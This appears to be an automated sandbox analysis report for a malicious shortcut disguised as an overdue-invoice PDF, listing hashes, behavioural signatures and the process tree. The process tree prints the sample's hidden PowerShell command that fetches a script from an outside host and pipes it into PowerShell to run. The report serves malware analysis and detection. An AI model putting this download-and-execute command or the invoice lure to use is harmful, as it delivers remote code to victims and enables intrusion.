Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
06-02-2023 16:44
Static task
static1
Behavioral task
behavioral1
Sample
Overdue_Invoice_2023.pdf.lnk
Resource
win7-20221111-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
Overdue_Invoice_2023.pdf.lnk
Resource
win10v2004-20221111-en
20 signatures
150 seconds
General
-
Target
Overdue_Invoice_2023.pdf.lnk
-
Size
1KB
-
MD5
65247221e9addff22b50070ba1893bb6
-
SHA1
e373bac187d3faeba2d13cb5cf284b79c10f7d0c
-
SHA256
9e9262ab44b3df0478357a790aa39abae9217e74349758e39db4bd7064597875
-
SHA512
a1a864489b98ddee67c21ee9014a6d3e44b1fd8790af9421b9d9515df7e06d6dbafc85b464424a51a48742d035ba25e423f8edb295107df5badc90c17e1babab
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 756 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 756 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 2040 wrote to memory of 756 2040 cmd.exe powershell.exe PID 2040 wrote to memory of 756 2040 cmd.exe powershell.exe PID 2040 wrote to memory of 756 2040 cmd.exe powershell.exe PID 2040 wrote to memory of 756 2040 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/f4Ag4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/756-88-0x0000000000000000-mapping.dmp
-
memory/756-92-0x0000000075FE1000-0x0000000075FE3000-memory.dmpFilesize
8KB
-
memory/756-93-0x0000000073CB0000-0x000000007425B000-memory.dmpFilesize
5.7MB
-
memory/756-94-0x0000000073CB0000-0x000000007425B000-memory.dmpFilesize
5.7MB
-
memory/2040-54-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmpFilesize
8KB